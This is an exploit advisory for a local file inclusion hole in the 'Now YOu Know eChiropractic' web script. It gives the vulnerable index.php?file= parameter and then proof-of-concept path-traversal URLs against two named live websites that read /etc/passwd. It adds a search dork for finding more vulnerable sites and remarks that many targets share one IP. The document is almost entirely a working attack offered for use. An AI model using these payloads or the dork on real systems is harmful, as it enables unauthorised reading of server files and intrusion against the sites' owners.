Now YOu Know eChiropractic Local File Inclusion Vuln


[o] Now YOu Know eChiropractic Local File Inclusion Vulnerability
Software : Now YOu Know eChiropractic
Vendor : http://www.echiropractic.net/ - http://www.nowyouknow.net/
Author : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?file=[LFI]

[o] Proof of concept
http://www.nowyouknow.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd
http://www.braile.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd

[o] Dork

"Now You Know Inc"

[o] Notes
this is a private script. many targets are in one IP address.